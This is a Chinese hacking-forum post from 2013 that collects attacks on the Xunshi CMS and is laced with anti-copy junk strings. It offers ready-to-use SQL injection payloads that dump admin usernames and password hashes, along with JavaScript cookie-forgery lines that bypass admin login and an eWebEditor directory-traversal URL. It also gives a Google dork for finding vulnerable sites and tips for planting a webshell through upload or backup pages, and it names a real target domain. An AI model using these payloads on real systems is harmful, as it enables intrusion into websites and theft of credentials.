找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2511|回复: 0
打印 上一主题 下一主题

讯时漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-16 21:25:50 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
by:血封忆尘; d: O& r! ]  y" F( _+ }

- i" `$ _% G0 p在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)' S' a9 e5 @6 m. N! N
+ R) F6 K2 H9 D' v! q" n
以下本文总结来自黑防去年第9期杂志上的内容...
: [0 ^* j, x9 t0 R9 i2 s) \( S: W* W; ?) E
先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%
9 [6 P0 V% Q* Q! j7 q  N7 X( C+ i/ t" @
26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
9 V* X2 d' D$ J8 \# c! s
" x6 p2 B) D% l+ S# Y' g( ]. ~记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况
8 S. N* h% j4 q这里一个注入: z4 y7 [2 }+ G& k" \1 Y9 u
$ M3 I) f5 M5 i$ D. L/ q* u
效果如图:
2 m' {8 z! L4 d, g: P7 ~
! `9 J0 h" E  ~, e7 L( B ' }' n+ c8 R& z6 q1 Q" W+ f

% L; F6 h7 ]8 a' _4 V4 h- j这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.
# g& `! P. o$ E5 ]% T
- I3 H# r* y$ F- Q密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去1 i$ b& L0 L7 Z
% |1 D9 {, d8 R3 E9 |$ p
javascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));
; W9 v# \6 q4 t; T& ~# |" e( X0 ?( G# K% @
那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:
, N4 ^, T8 K3 F# p$ @3 U5 K8 X: L; T1 X; F; ~  f
因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞
( [3 r9 M8 V8 y; |3 A
6 \3 ~$ l% O0 W, {1 x它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以
) R8 k0 m% s1 ^4 R9 M# n! L/ _" D2 ?$ S, A/ [
访问这页面来列目录..步骤如下:( T3 g7 N/ g: V, |" N8 }' y- V

3 ?& l3 x7 P7 [3 Rjavascript:alert(document.cookie="admindj=1") ' T: o9 m& }# {' h% P, \

+ m$ t# O2 {9 ~/ P3 Hhttp://www.political-security.co ... asp?id=46&dir=../..& v# M4 G! A5 ?
9 i, C( j" \. k9 v( E  n+ ?1 I
效果如图:/ S% W! Z& g, L9 z1 z

; X4 S$ {3 k$ G; P
8 T& w; B/ x3 y' n' U( b( y# |) c) i) {, G$ @1 k( C! S- V
这样全站目录都能瞧了..找到后台目录..进去..
9 ~& H: r& W, e5 k! s; t
/ D$ e6 U& }) w! p% S) o9 u那么进了后台怎么拿shell??上传--备份就ok了..9 g" ~6 L. ]' p" E" S' P/ _
3 ?0 }: X, L0 [  Y- H' A0 H  q: ~
那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..' A( q1 S7 e8 n

7 I7 T( m: F3 K/ P$ x这个我也碰到过一次..你都可以通过列目录来实现..
% _7 }# Z! U- o% {6 J- n" J3 V% C. T2 }$ b: l
javascript:alert(document.cookie="admindj=1") ) o" U& R+ T1 {0 {/ c' X
6 H+ O+ o7 \/ r$ F4 c
http://www.political-security.co ... p?action=BackupData ! m/ [- ?1 o2 o

+ X2 U0 w9 s4 U1 N备份ok..0 s. l. M( ~9 T7 A6 e

8 {3 _4 [& m' l$ B' |7 p) T7 [7 p; J那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?- w8 M7 Z4 d  t! R, D
6 ?0 |  y; o. t" ~+ f/ E' s5 H7 ?4 s
在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下
  U( d" Q9 {! L4 g/ r: g  a0 M+ a
6 I3 |* h( D* M8 ]: ^  w然后访问此页面进行注入..步骤如下:
$ s+ T% @4 \6 B
" C8 B& v$ Q, e7 U; W" ^javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")
; A$ x' k/ f8 M) Q8 Q6 k) Q- t% p3 s" d  w9 ?
然后请求admin/admin_chk.asp页面6 o+ X3 }5 ~, g4 H' x6 D
( |  a9 z# O* n! _! k- j) ^
输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%2 e+ g& G: o; k  g, s
4 w. c. J- ~8 w6 {2 C7 q
26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
& l) X2 J( ~# G
1 @+ ~% A1 [6 _  K: ^效果如图所示:5 J- N# {3 S4 a6 x' A$ i2 }
$ s  Z/ W) r1 T" a' R$ G8 C

( }( M. c2 _" w) f/ C1 _
& N7 L- ~  }" _6 V" L$ S讯时漏洞2
. P( D9 t# o5 ]: I/ H) |5 d6 [google关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)
/ w4 j6 j; @) e0 i% Z) j+ r% j 5 W2 Q8 v  m+ K0 n( q; c: `
1、/admin/admin_news_pl_view.asp?id=1# |$ T6 I* U2 l6 J7 i& A4 C
//id任意 填入以下语句
. v1 |3 b+ _, a$ h! T6 c
9 Y! M9 D# o: ^2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!
6 H! B1 R0 S% X% b2 T
: ~  z& c6 y6 ^5 `9 W5 n# D, K. }9 i5 B# R( y! V' Z- U7 y
$ B6 W8 g9 e4 F8 _
3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='+ C3 t" j# r, Z

8 w* S& ^  h2 K: c7 _3 U: w) i2 s$ W* X! m4 X3 m& u

2 w/ }+ T  |0 A! @# q- w0 Z爆出管理员帐号和密码了
# J  f7 v* r+ |9 w! [ ( M) h8 T/ U& h4 A* s7 |

6 e/ W" b5 W: _9 I" |! t% Z% v0 b. U9 A1 z
4、cookies进后台
0 P3 d2 R8 S/ q* w 5 L3 g7 d7 z: @5 J; h1 @- G1 f
javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));$ ]! s0 ]2 P/ V$ m# N% g9 p

5 h0 E  d- B  d$ v- S4 R8 S$ G) X5 y: p! c/ q

# I" }; s4 @5 k5 V: r5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!
" f. E# l# e8 x
# V  ]# _/ D: ~  p+ ]& e3 q; F% y2 d3 ^& o# d" Q- o: I. ^- S8 z$ B
# u  Q( ^# D0 j( ^
6、后台有上传和备份取SHELL不难。; f* {: c" N  B7 B- l) Y
% F1 a8 P& {6 {+ E
7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..
3 \6 x" x& u9 N! n1 q , ^* b$ E- |5 [
逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!
! Q9 r. T! a( ~1 v: k
8 p# R  f  q5 E' B7 E4 s+ h" z: m
9 H( H# n8 g3 y; {
, s- [8 W; t5 ~% K% l
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表